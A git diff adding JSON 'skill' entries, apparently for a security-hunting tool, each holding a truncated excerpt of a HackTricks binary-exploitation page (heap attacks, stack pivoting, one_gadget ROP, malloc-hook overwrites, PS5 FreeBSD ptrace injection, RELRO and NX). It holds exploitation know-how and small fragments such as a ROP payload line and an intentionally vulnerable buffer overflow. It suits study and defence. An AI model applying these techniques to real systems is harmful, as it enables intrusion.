+ "| Type | Size (bits) | Min Value | Max Value |",
+ "|----------------|-------------|--------------------|--------------------|",
+ "| int8_t | 8 | -128 | 127 |",
+ "| uint8_t | 8 | 0 | 255 |",
+ "| int16_t | 16 | -32,768 | 32,767 |",
+ "| uint16_t | 16 | 0 | 65,535 |",
+ "| int32_t | 32 | -2,147,483,648 | 2,147,483,647 |",
+ "| uint32_t | 32 | 0 | 4,294,967,295 |"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/integer-overflow-and-underflow.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_296af1af5313.json b/skills/binary_exploitation_296af1af5313.json
new file mode 100644
index 0000000..4b280a7
--- /dev/null
+++ b/skills/binary_exploitation_296af1af5313.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_296af1af5313",
+ "category": "binary-exploitation",
+ "title": "freebsd ptrace rfi vm map prot exec bypass ps5",
+ "description": "# FreeBSD ptrace RFI and vm_map PROT_EXEC bypass (PS5 case study)\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Overview\n\nThis page documents a practical Unix/BSD usermode process/ELF injection technique on PlayStation 5 (PS5), which is based on FreeBSD. The method generalizes to FreeBSD derivatives when you already have kernel read/write (R/W) primitives. High level:\n\n- Patch the current process credentials (ucred) to grant debugger authority, enabling ptrace/mdbg on arbitrary user proces",
+ "payloads": [
+ "# FreeBSD ptrace RFI and vm_map PROT_EXEC bypass (PS5 case study)",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Overview",
+ "This page documents a practical Unix/BSD usermode process/ELF injection technique on PlayStation 5 (PS5), which is based on FreeBSD. The method generalizes to FreeBSD derivatives when you already have kernel read/write (R/W) primitives. High level:",
+ "- Patch the current process credentials (ucred) to grant debugger authority, enabling ptrace/mdbg on arbitrary user processes.",
+ "- Find target processes by walking the kernel allproc list.",
+ "- Bypass PROT_EXEC restrictions by flipping vm_map_entry.protection |= PROT_EXEC in the target\u2019s vm_map via kernel data writes.",
+ "- Use ptrace to perform Remote Function Invocation (RFI): suspend a thread, set registers to call arbitrary functions inside the target, resume, collect return values, and restore state.",
+ "- Map and run arbitrary ELF payloads inside the target using an in-process ELF loader, then spawn a dedicated thread that runs your payload and triggers a breakpoint to detach cleanly.",
+ "PS5 hypervisor mitigations worth noting (contextualized for this technique):",
+ "- XOM (execute-only .text) prevents reading/writing kernel .text.",
+ "- Clearing CR0.WP or disabling CR4.SMEP causes a hypervisor vmexit (crash). Only data-only kernel writes are viable.",
+ "- Userland mmap is restricted to PROT_READ|PROT_WRITE by default. Granting PROT_EXEC must be done by editing vm_map entries in kernel memory.",
+ "This technique is post-exploitation: it assumes kernel R/W primitives from an exploit chain. Public payloads demonstrate this up to firmware 10.01 at time of writing.",
+ "## Kernel data-only primitives"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/freebsd-ptrace-rfi-vm_map-prot_exec-bypass-ps5.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_2f1d71888faa.json b/skills/binary_exploitation_2f1d71888faa.json
new file mode 100644
index 0000000..29434a9
--- /dev/null
+++ b/skills/binary_exploitation_2f1d71888faa.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_2f1d71888faa",
+ "category": "binary-exploitation",
+ "title": "stack pivoting ebp2ret ebp chaining",
+ "description": "# Stack Pivoting - EBP2Ret - EBP chaining\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThis technique exploits the ability to manipulate the **Base Pointer (EBP/RBP)** to chain the execution of multiple functions through careful use of the frame pointer and the **`leave; ret`** instruction sequence.\n\nAs a reminder, on x86/x86-64 **`leave`** is equivalent to:\n\n```\nmov rsp, rbp ; mov esp, ebp on x86\npop rbp ; pop ebp on x86\nret\n```\n\nAnd as the save",
+ "payloads": [
+ "# Stack Pivoting - EBP2Ret - EBP chaining",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "This technique exploits the ability to manipulate the **Base Pointer (EBP/RBP)** to chain the execution of multiple functions through careful use of the frame pointer and the **`leave; ret`** instruction sequence.",
+ "As a reminder, on x86/x86-64 **`leave`** is equivalent to:",
+ "mov rsp, rbp ; mov esp, ebp on x86",
+ "pop rbp ; pop ebp on x86",
+ "And as the saved **EBP/RBP is in the stack** before the saved EIP/RIP, it's possible to control it by controlling the stack.",
+ "> Notes",
+ "> - On 64-bit, replace EBP\u2192RBP and ESP\u2192RSP. Semantics are the same.",
+ "> - Some compilers omit the frame pointer (see \u201cEBP might not be used\u201d). In that case, `leave` might not appear and this technique won\u2019t work.",
+ "### EBP2Ret",
+ "This technique is particularly useful when you can **alter the saved EBP/RBP but have no direct way to change EIP/RIP**. It leverages the function epilogue behavior.",
+ "If, during `fvuln`'s execution, you manage to inject a **fake EBP** in the stack that points to an area in memory where your shellcode/ROP chain address is located (plus 8 bytes on amd64 / 4 bytes on x86 to account for the `pop`), you can indirectly control RIP. As the function returns, `leave` sets RSP to the crafted location and the subsequent `pop rbp` decreases RSP, **effectively making it point to an address stored by the attacker there**. Then `ret` will use that address.",
+ "Note how you **need to know 2 addresses**: the address where ESP/RSP is going to go, and the value stored at that address that `ret` will consume."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_3018fbf9c0af.json b/skills/binary_exploitation_3018fbf9c0af.json
new file mode 100644
index 0000000..ad56827
--- /dev/null
+++ b/skills/binary_exploitation_3018fbf9c0af.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_3018fbf9c0af",
+ "category": "binary-exploitation",
+ "title": "house of spirit",
+ "description": "# House of Spirit\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\n### Code\n\n\n\nHouse of Spirit\n\n```c\n#include \n#include \n#include \n#include \n\n// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit\n\nstruct fast_chunk {\n size_t prev_size;\n size_t size;\n struct fast_chunk *fd;\n struct fast_chunk *bk;\n char buf[0x20]; // chunk falls in fast",
+ "payloads": [
+ "# House of Spirit",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "### Code",
+ "",
+ "House of Spirit",
+ "#include ",
+ "#include ",
+ "#include ",
+ "#include ",
+ "// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit",
+ "struct fast_chunk {",
+ "size_t prev_size;",
+ "size_t size;",
+ "struct fast_chunk *fd;"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/house-of-spirit.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_32b4fb2d38b7.json b/skills/binary_exploitation_32b4fb2d38b7.json
new file mode 100644
index 0000000..d802a74
--- /dev/null
+++ b/skills/binary_exploitation_32b4fb2d38b7.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_32b4fb2d38b7",
+ "category": "binary-exploitation",
+ "title": "large bin attack",
+ "description": "# Large Bin Attack\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nFor more information about what is a large bin check this page:\n\n\n{{#ref}}\nbins-and-memory-allocations.md\n{{#endref}}\n\nIt's possible to find a great example in [**how2heap - large bin attack**](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/large_bin_attack.c).\n\nBasically here you can see how, in the latest \"current\" version of glibc (2.35), it's not checked: **`P->bk_nextsize`** allowing ",
+ "payloads": [
+ "# Large Bin Attack",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "For more information about what is a large bin check this page:",
+ "{{#ref}}",
+ "bins-and-memory-allocations.md",
+ "{{#endref}}",
+ "It's possible to find a great example in [**how2heap - large bin attack**](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/large_bin_attack.c).",
+ "Basically here you can see how, in the latest \"current\" version of glibc (2.35), it's not checked: **`P->bk_nextsize`** allowing to modify an arbitrary address with the value of a large bin chunk if certain conditions are met.",
+ "In that example you can find the following conditions:",
+ "- A large chunk is allocated",
+ "- A large chunk smaller than the first one but in the same index is allocated",
+ "- Must be smalled so in the bin it must go first",
+ "- (A chunk to prevent merging with the top chunk is created)",
+ "- Then, the first large chunk is freed and a new chunk bigger than it is allocated -> Chunk1 goes to the large bin"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/large-bin-attack.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_35830236fcaf.json b/skills/binary_exploitation_35830236fcaf.json
new file mode 100644
index 0000000..f22ac18
--- /dev/null
+++ b/skills/binary_exploitation_35830236fcaf.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_35830236fcaf",
+ "category": "binary-exploitation",
+ "title": "relro",
+ "description": "# Relro\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Relro\n\n**RELRO** stands for **Relocation Read-Only** and it is a mitigation implemented by the linker (`ld`) that turns a subset of the ELF\u2019s data segments **read-only after all relocations have been applied**. The goal is to stop an attacker from overwriting entries in the **GOT (Global Offset Table)** or other relocation-related tables that are dereferenced during program execution (e.g. `__fini_array`).\n\nModern linkers implement ",
+ "payloads": [
+ "# Relro",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Relro",
+ "**RELRO** stands for **Relocation Read-Only** and it is a mitigation implemented by the linker (`ld`) that turns a subset of the ELF\u2019s data segments **read-only after all relocations have been applied**. The goal is to stop an attacker from overwriting entries in the **GOT (Global Offset Table)** or other relocation-related tables that are dereferenced during program execution (e.g. `__fini_array`).",
+ "Modern linkers implement RELRO by **re\u2013ordering** the **GOT** (and a few other sections) so they live **before** the **.bss** and \u2013 most importantly \u2013 by creating a dedicated `PT_GNU_RELRO` segment that is remapped `R\u2013X` right after the dynamic loader finishes applying relocations. Consequently, typical buffer overflows in the **.bss** can no longer reach the GOT and arbitrary\u2010write primitives cannot be used to overwrite function pointers that sit inside a RELRO-protected page.",
+ "There are **two levels** of protection that the linker can emit:",
+ "### Partial RELRO",
+ "* Produced with the flag `-Wl,-z,relro` (or just `-z relro` when invoking `ld` directly).",
+ "* Only the **non-PLT** part of the **GOT** (the part used for data relocations) is put into the read-only segment. Sections that need to be modified at run-time \u2013 most importantly **.got.plt** which supports **lazy binding** \u2013 remain writable.",
+ "* Because of that, an **arbitrary write** primitive can still redirect execution flow by overwriting a PLT entry (or by performing **ret2dlresolve**).",
+ "* The performance impact is negligible and therefore **almost every distribution has been shipping packages with at least Partial RELRO for years (it is the GCC/Binutils default as of 2016)**.",
+ "### Full RELRO",
+ "* Produced with **both** flags `-Wl,-z,relro,-z,now` (a.k.a. `-z relro -z now`). `-z now` forces the dynamic loader to resolve **all** symbols up-front (eager binding) so that **.got.plt** never needs to be written again and can safely be mapped read-only.",
+ "* The entire **GOT**, **.got.plt**, **.fini_array**, **.init_array**, **.preinit_array** and a few additional internal glibc tables end up inside a read-only `PT_GNU_RELRO` segment.",
+ "* Adds measurable start-up overhead (all dynamic relocations are processed at launch) but **no run-time overhead**."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/common-binary-protections-and-bypasses/relro.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_361efdf19202.json b/skills/binary_exploitation_361efdf19202.json
new file mode 100644
index 0000000..cc8a00b
--- /dev/null
+++ b/skills/binary_exploitation_361efdf19202.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_361efdf19202",
+ "category": "binary-exploitation",
+ "title": "one gadget",
+ "description": "# One Gadget\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## Basic Information\n\n[**One Gadget**](https://github.com/david942j/one_gadget) allows to obtain a shell instead of using **system** and **\"/bin/sh\". One Gadget** will find inside the libc library some way to obtain a shell (`execve(\"/bin/sh\")`) using just one **address**.\\\nHowever, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP*",
+ "payloads": [
+ "# One Gadget",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "[**One Gadget**](https://github.com/david942j/one_gadget) allows to obtain a shell instead of using **system** and **\"/bin/sh\". One Gadget** will find inside the libc library some way to obtain a shell (`execve(\"/bin/sh\")`) using just one **address**.\\",
+ "However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided.",
+ ".png>)",
+ "```python",
+ "ONE_GADGET = libc.address + 0x4526a",
+ "rop2 = base + p64(ONE_GADGET) + \"\\x00\"*100",
+ "To the address indicated by One Gadget you need to **add the base address where `libc`** is loaded.",
+ "> [!TIP]",
+ "> One Gadget is a **great help for Arbitrary Write 2 Exec techniques** and might **simplify ROP** **chains** as you only need to call one address (and fulfil the requirements).",
+ "### ARM64",
+ "The github repo mentions that **ARM64 is supported** by the tool, but when running it in the libc of a Kali 2023.3 **it doesn't find any gadget**.",
+ "## Angry Gadget"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_406bcebe41d5.json b/skills/binary_exploitation_406bcebe41d5.json
new file mode 100644
index 0000000..b8f1bb5
--- /dev/null
+++ b/skills/binary_exploitation_406bcebe41d5.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_406bcebe41d5",
+ "category": "binary-exploitation",
+ "title": "aw2exec malloc hook",
+ "description": "# WWW2Exec - __malloc_hook & __free_hook\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## **Malloc Hook**\n\nAs you can [Official GNU site](https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html), the variable **`__malloc_hook`** is a pointer pointing to the **address of a function that will be called** whenever `malloc()` is called **stored in the data section of the libc library**. Therefore, if this address is overwritten with a **One Gadget** for example and `malloc` is",
+ "payloads": [
+ "# WWW2Exec - __malloc_hook & __free_hook",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## **Malloc Hook**",
+ "As you can [Official GNU site](https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html), the variable **`__malloc_hook`** is a pointer pointing to the **address of a function that will be called** whenever `malloc()` is called **stored in the data section of the libc library**. Therefore, if this address is overwritten with a **One Gadget** for example and `malloc` is called, the **One Gadget will be called**.",
+ "To call malloc it's possible to wait for the program to call it or by **calling `printf(\"%10000$c\")`** which allocates too bytes many making `libc` calling malloc to allocate them in the heap.",
+ "More info about One Gadget in:",
+ "{{#ref}}",
+ "../rop-return-oriented-programing/ret2lib/one-gadget.md",
+ "{{#endref}}",
+ "> [!WARNING]",
+ "> Note that hooks are **disabled for GLIBC >= 2.34**. There are other techniques that can be used on modern GLIBC versions. See: [https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md).",
+ "## Free Hook",
+ "This was abused in one of the example from the page abusing a fast bin attack after having abused an unsorted bin attack:",
+ "{{#ref}}",
+ "../libc-heap/unsorted-bin-attack.md"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_4115701112fb.json b/skills/binary_exploitation_4115701112fb.json
new file mode 100644
index 0000000..3f0b89a
--- /dev/null
+++ b/skills/binary_exploitation_4115701112fb.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_4115701112fb",
+ "category": "binary-exploitation",
+ "title": "ret2win arm64",
+ "description": "# Ret2win - arm64\n\n{{#include ../../../banners/hacktricks-training.md}}\n\nFind an introduction to arm64 in:\n\n\n{{#ref}}\n../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md\n{{#endref}}\n\n## Code\n\n```c\n#include \n#include \n\nvoid win() {\n printf(\"Congratulations!\\n\");\n}\n\nvoid vulnerable_function() {\n char buffer[64];\n read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability\n}\n\nint main() {\n ",
+ "payloads": [
+ "# Ret2win - arm64",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "Find an introduction to arm64 in:",
+ "{{#ref}}",
+ "../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md",
+ "{{#endref}}",
+ "## Code",
+ "#include ",
+ "#include ",
+ "void win() {",
+ "printf(\"Congratulations!\\n\");",
+ "void vulnerable_function() {",
+ "char buffer[64];",
+ "read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability",
+ "int main() {"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_41520aa67ef5.json b/skills/binary_exploitation_41520aa67ef5.json
new file mode 100644
index 0000000..4d487aa
--- /dev/null
+++ b/skills/binary_exploitation_41520aa67ef5.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_41520aa67ef5",
+ "category": "binary-exploitation",
+ "title": "heap overflow",
+ "description": "# Heap Overflow\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nA heap overflow is like a [**stack overflow**](../stack-overflow/index.html) but in the heap. Basically it means that some space was reserved in the heap to store some data and **stored data was bigger than the space reserved.**\n\nIn stack overflows we know that some registers like the instruction pointer or the stack frame are going to be restored from the stack and it could be possible to abuse this. In ca",
+ "payloads": [
+ "# Heap Overflow",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "A heap overflow is like a [**stack overflow**](../stack-overflow/index.html) but in the heap. Basically it means that some space was reserved in the heap to store some data and **stored data was bigger than the space reserved.**",
+ "In stack overflows we know that some registers like the instruction pointer or the stack frame are going to be restored from the stack and it could be possible to abuse this. In case of heap overflows, there **isn't any sensitive information stored by default** in the heap chunk that can be overflowed. However, it could be sensitive information or pointers, so the **criticality** of this vulnerability **depends** on **which data could be overwritten** and how an attacker could abuse this.",
+ "> [!TIP]",
+ "> In order to find overflow offsets you can use the same patterns as in [**stack overflows**](../stack-overflow/index.html#finding-stack-overflows-offsets).",
+ "### Stack Overflows vs Heap Overflows",
+ "In stack overflows the arranging and data that is going to be present in the stack at the moment the vulnerability can be triggered is fairly reliable. This is because the stack is linear, always increasing in colliding memory, in **specific places of the program run the stack memory usually stores similar kind of data** and it has some specific structure with some pointers at the end of the stack part used by each function.",
+ "However, in the case of a heap overflow, the used memory isn\u2019t linear but **allocated chunks are usually in separated positions of memory** (not one next to the other) because of **bins and zones** separating allocations by size and because **previous freed memory is used** before allocating new chunks. It\u2019s **complicated to know the object that is going to be colliding with the one vulnerable** to a heap overflow. So, when a heap overflow is found, it\u2019s needed to find a **reliable way to make the desired object to be next in memory** from the one that can be overflowed.",
+ "One of the techniques used for this is **Heap Grooming** which is used for example [**in this post**](https://azeria-labs.com/grooming-the-ios-kernel-heap/). In the post it\u2019s explained how when in iOS kernel when a zone run out of memory to store chunks of memory, it expands it by a kernel page, and this page is splitted into chunks of the expected sizes which would be used in order (until iOS version 9.2, then these chunks are used in a randomised way to difficult the exploitation of these attacks).",
+ "Therefore, in the previous post where a heap overflow is happening, in order to force the overflowed object to be colliding with a victim order, several **`kallocs` are forced by several threads to try to ensure that all the free chunks are filled and that a new page is created**.",
+ "In order to force this filling with objects of a specific size, the **out-of-line allocation associated with an iOS mach port** is an ideal candidate. By crafting the size of the message, it\u2019s possible to exactly specify the size of `kalloc` allocation and when the corresponding mach port is destroyed, the corresponding allocation will be immediately released back to `kfree`.",
+ "Then, some of these placeholders can be **freed**. The **`kalloc.4096` free list releases elements in a last-in-first-out order**, which basically means that if some place holders are freed and the exploit try lo allocate several victim objects while trying to allocate the object vulnerable to overflow, it\u2019s probable that this object will be followed by a victim object.",
+ "### Example libc"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/heap-overflow.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_41a70ca7bc0b.json b/skills/binary_exploitation_41a70ca7bc0b.json
new file mode 100644
index 0000000..9258a6f
--- /dev/null
+++ b/skills/binary_exploitation_41a70ca7bc0b.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_41a70ca7bc0b",
+ "category": "binary-exploitation",
+ "title": "heap functions security checks",
+ "description": "# Heap Functions Security Checks\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## unlink\n\nFor more info check:\n\n\n{{#ref}}\nunlink.md\n{{#endref}}\n\nThis is a summary of the performed checks:\n\n- Check if the indicated size of the chunk is the same as the `prev_size` indicated in the next chunk\n - Error message: `corrupted size vs. prev_size`\n- Check also that `P->fd->bk == P` and `P->bk->fw == P`\n - Error message: `corrupted double-linked list`\n- If the chunk is not small, check that `P->",
+ "payloads": [
+ "# Heap Functions Security Checks",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## unlink",
+ "For more info check:",
+ "{{#ref}}",
+ "unlink.md",
+ "{{#endref}}",
+ "This is a summary of the performed checks:",
+ "- Check if the indicated size of the chunk is the same as the `prev_size` indicated in the next chunk",
+ "- Error message: `corrupted size vs. prev_size`",
+ "- Check also that `P->fd->bk == P` and `P->bk->fw == P`",
+ "- Error message: `corrupted double-linked list`",
+ "- If the chunk is not small, check that `P->fd_nextsize->bk_nextsize == P` and `P->bk_nextsize->fd_nextsize == P`",
+ "- Error message: `corrupted double-linked list (not small)`",
+ "## \\_int_malloc"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_4720a285889e.json b/skills/binary_exploitation_4720a285889e.json
new file mode 100644
index 0000000..073b256
--- /dev/null
+++ b/skills/binary_exploitation_4720a285889e.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_4720a285889e",
+ "category": "binary-exploitation",
+ "title": "unlink attack",
+ "description": "# Unlink Attack\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nWhen this attack was discovered it mostly allowed a WWW (Write What Where), however, some **checks were added** making the new version of the attack more interesting more more complex and **useless**.\n\n### Code Example:\n\n\n\nCode\n\n```c\n#include \n#include \n#include \n#include \n\n// Altered from https://github.com/DhavalKapil/heap-exploitation/tre",
+ "payloads": [
+ "# Unlink Attack",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "When this attack was discovered it mostly allowed a WWW (Write What Where), however, some **checks were added** making the new version of the attack more interesting more more complex and **useless**.",
+ "### Code Example:",
+ "",
+ "Code",
+ "#include ",
+ "#include ",
+ "#include ",
+ "#include ",
+ "// Altered from https://github.com/DhavalKapil/heap-exploitation/tree/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/unlink_exploit.c to make it work",
+ "struct chunk_structure {",
+ "size_t prev_size;",
+ "size_t size;"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/unlink-attack.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_472f9c301a62.json b/skills/binary_exploitation_472f9c301a62.json
new file mode 100644
index 0000000..5eceb48
--- /dev/null
+++ b/skills/binary_exploitation_472f9c301a62.json
@@ -0,0 +1,24 @@
+{
+ "id": "binary_exploitation_472f9c301a62",
+ "category": "binary-exploitation",
+ "title": "overwriting a freed chunk",
+ "description": "# Overwriting a freed chunk\n\n{{#include ../../banners/hacktricks-training.md}}\n\nSeveral of the proposed heap exploitation techniques need to be able to overwrite pointers inside freed chunks. The goal of this page is to summarise the potential vulnerabilities that could grant this access:\n\n### Simple Use After Free\n\nIf it's possible for the attacker to **write info in a free chunk**, they could abuse this to overwrite the needed pointers.\n\n### Double Free\n\nIf the attacker can **`free` two times ",
+ "payloads": [
+ "# Overwriting a freed chunk",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "Several of the proposed heap exploitation techniques need to be able to overwrite pointers inside freed chunks. The goal of this page is to summarise the potential vulnerabilities that could grant this access:",
+ "### Simple Use After Free",
+ "If it's possible for the attacker to **write info in a free chunk**, they could abuse this to overwrite the needed pointers.",
+ "### Double Free",
+ "If the attacker can **`free` two times the same chunk** (free other chunks in between potentially) and make it be **2 times in the same bin**, it would be possible for the user to **allocate the chunk later**, **write the needed pointers** and then **allocate it again** triggering the actions of the chunk being allocated (e.g. fast bin attack, tcache attack...)",
+ "### Heap Overflow",
+ "It might be possible to **overflow an allocated chunk having next a freed chunk** and modify some headers/pointers of it.",
+ "### Off-by-one overflow",
+ "In this case it would be possible to **modify the size** of the following chunk in memory. An attacker could abuse this to **make an allocated chunk have a bigger size**, then **`free`** it, making the chunk been **added to a bin of a different** size (bigger), then allocate the **fake size**, and the attack will have access to a **chunk with a size which is bigger** than it really is, **granting therefore an overlapping chunks situation**, which is exploitable the same way to a **heap overflow** (check previous section).",
+ "{{#include ../../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_4b24b00d456a.json b/skills/binary_exploitation_4b24b00d456a.json
new file mode 100644
index 0000000..cc12e76
--- /dev/null
+++ b/skills/binary_exploitation_4b24b00d456a.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_4b24b00d456a",
+ "category": "binary-exploitation",
+ "title": "no exec nx",
+ "description": "# No-exec / NX\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThe **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel terminology, is a hardware-based security feature designed to **mitigate** the effects of **buffer overflow** attacks. When implemented and enabled, it distinguishes between memory regions that are intended for **executable code** and those meant for **data**, such as the **stack** and **heap**. The core idea is to prevent an attack",
+ "payloads": [
+ "# No-exec / NX",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel terminology, is a hardware-based security feature designed to **mitigate** the effects of **buffer overflow** attacks. When implemented and enabled, it distinguishes between memory regions that are intended for **executable code** and those meant for **data**, such as the **stack** and **heap**. The core idea is to prevent an attacker from executing malicious code through buffer overflow vulnerabilities by putting the malicious code in the stack for example and directing the execution flow to it.",
+ "Modern operating systems enforce NX through the page table attributes that back the ELF program headers. For example, the `PT_GNU_STACK` header combined with the `GNU_PROPERTY_X86_FEATURE_1_SHSTK` or `GNU_PROPERTY_X86_FEATURE_1_IBT` properties let the loader know whether the stack should be **RW** or **RWX**. When NX is enabled and the binary was linked with a non-executable stack (`-z noexecstack`), any attempt to pivot execution into attacker-controlled data pages (stack, heap, mmap'ed buffers, etc.) will raise a fault unless those pages were explicitly marked as executable.",
+ "### Detecting NX quickly",
+ "- `checksec --file ./vuln` will display `NX enabled` or `NX disabled` based on the `GNU_STACK` program header.",
+ "- `readelf -W -l ./vuln | grep GNU_STACK` exposes the stack permissions; the presence of an `E` flag indicates that the stack is executable. Example:",
+ "```bash",
+ "$ readelf -W -l ./vuln | grep GNU_STACK",
+ "GNU_STACK 0x000000 0x000000 0x000000 0x000000 0x000000 RW 0x10",
+ "- `execstack -q ./vuln` (from `prelink`) is handy when auditing large collections of binaries because it prints `X` for binaries that still have an executable stack.",
+ "- At runtime, `/proc//maps` will show whether an allocation is `rwx`, `rw-`, `r-x`, etc., which is useful when verifying JIT engines or custom allocators.",
+ "## Bypasses",
+ "### Code-reuse primitives"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_4c5614d712c9.json b/skills/binary_exploitation_4c5614d712c9.json
new file mode 100644
index 0000000..1dd5322
--- /dev/null
+++ b/skills/binary_exploitation_4c5614d712c9.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_4c5614d712c9",
+ "category": "binary-exploitation",
+ "title": "ret2esp ret2reg",
+ "description": "# Ret2esp / Ret2reg\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## **Ret2esp**\n\n**Because the ESP (Stack Pointer) always points to the top of the stack**, this technique involves replacing the EIP (Instruction Pointer) with the address of a **`jmp esp`** or **`call esp`** instruction. By doing this, the shellcode is placed right after the overwritten EIP. When the `ret` instruction executes, ESP points to the next address, precisely where the shellcode is stored.\n\nIf **Address Space Layo",
+ "payloads": [
+ "# Ret2esp / Ret2reg",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## **Ret2esp**",
